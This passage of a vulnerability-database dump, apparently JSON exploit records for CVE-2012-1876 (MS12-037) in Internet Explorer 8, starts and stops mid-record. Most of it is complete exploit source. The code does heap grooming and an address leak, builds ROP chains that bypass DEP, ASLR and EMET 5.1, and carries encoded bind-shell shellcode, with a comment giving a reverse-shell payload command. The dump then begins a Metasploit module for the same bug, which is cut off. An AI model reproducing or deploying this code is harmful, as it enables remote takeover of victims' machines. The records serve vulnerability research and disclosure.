) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var 
rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } 
RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // Standard DEP bypass\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n\n // Bind 
shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp\n // You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= 
padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)", "edition": 1, "published": "2014-11-17T00:00:00", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-11-17T00:00:00", "id": "EXPLOITPACK:87ECAF4F1FACB468F006F877AE38824E", "href": "", "sourceData": "<!--\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass\n** Exploit Coded by sickness || EMET 5.1 bypass by ryujin\n** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/\n** Affected Software: Internet Explorer 8\n** Vulnerability: Fixed Col Span ID\n** CVE: CVE-2012-1876\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & 
EMET 5.1\n-->\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } 
RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH 
EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\n var rop = rop.toString(16);\n var rop41 = rop.substring(4,8);\n var rop42 = rop.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4444\");\n while (shellcode.length < 100)\n shellcode = shellcode + shellcode;\n var shellcode = shellcode.substr(0, 46);\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01 annihilate ROP protections\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument) \n shellcode+= unescape(\"%u7372%u0006\"); // 
Offset to \"decoding helper\" 0x67372\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\" \n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue \n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # RETN\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on) \n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\n shellcode+= 
unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n\n // Store various pointers here\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address 
on the *stack*\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // Store various pointers here\n\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread \n // MOV EAX,DWORD PTR DS:[076D10BCH]\n // MOV EAX,DWORD PTR DS:[007D25F48H]\n // MOV ESI,DWORD PTR [EAX+518H]\n // SUB ESP,2CCH\n // MOV DWORD PTR [ESP],10010H\n // MOV EDI,ESP\n // MOV ECX,2CCH\n // ADD EDI,4\n // SUB ECX,4\n // XOR EAX,EAX\n // REP STOS BYTE PTR ES:[EDI]\n // PUSH ESP\n // PUSH 0FFFFFFFEH\n // CALL ESI\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\n \"%ufe6a%ud6ff\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n 
\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1312272\"; // 0x07D25E40\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:02:58", "description": "This 
module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.\n", "published": "2012-07-31T21:14:29", "type": "metasploit", "title": "MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS12_037_IE_COLSPAN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :ua_minver => \"8.0\",\n # :ua_maxver => \"8.0\",\n # :rank => NormalRanking, # reliable memory corruption\n # :javascript => true\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',\n 'Description' => %q{\n This module exploits a heap overflow vulnerability in Internet Explorer caused\n by an incorrect handling of the span attribute for col elements from a fixed table,\n when they are modified dynamically by javascript code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Alexandre Pelletier', # Vulnerability analysis\n 'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\n 'binjo', # Metasploit module\n 'sinn3r', # Help with the Metasploit module\n 'juan vazquez' # Help with the Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-1876' ],\n [ 'OSVDB', '82866'],\n [ 'BID', '53848' ],\n [ 'MSB', 'MS12-037' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 
'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3 with msvcrt ROP',\n {\n 'Rop' => :msvcrt\n }\n ],\n [ 'IE 8 on Windows 7 SP1',\n {\n 'Rop' => :jre\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-06-12',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\n return targets[1] #IE 8 on Windows XP SP3\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/\n return targets[2] #IE 8 on Windows 7 with JRE\n else\n return nil\n end\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\").first\n end\n\n def nop\n return make_nops(4).unpack(\"V\").first\n end\n\n def get_payload(t)\n\n code = payload.encoded\n\n # Both ROP chains generated by mona.py - See corelan.be\n case t['Rop']\n when :msvcrt\n print_status(\"Using msvcrt ROP\")\n exec_size = code.length\n rop =\n [\n 0x77c4ec01, # retn\n 0x77c4ec00, # pop ebp; retn\n 0x77c15ed5, # xchg eax,esp; retn (pivot)\n 0x77c4e392, # pop eax; retn\n 0x77c11120, # <- *&VirtualProtect()\n 0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn\n junk,\n 0x77c2dd6c,\n 0x77c4ec00, # pop ebp; retn\n 0x77c35459, # ptr to 'push esp; ret'\n 0x77c47705, # pop ebx; retn\n exec_size, # ebx\n 0x77c3ea01, # pop ecx; retn\n 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\n 0x77c46100, # pop edi; 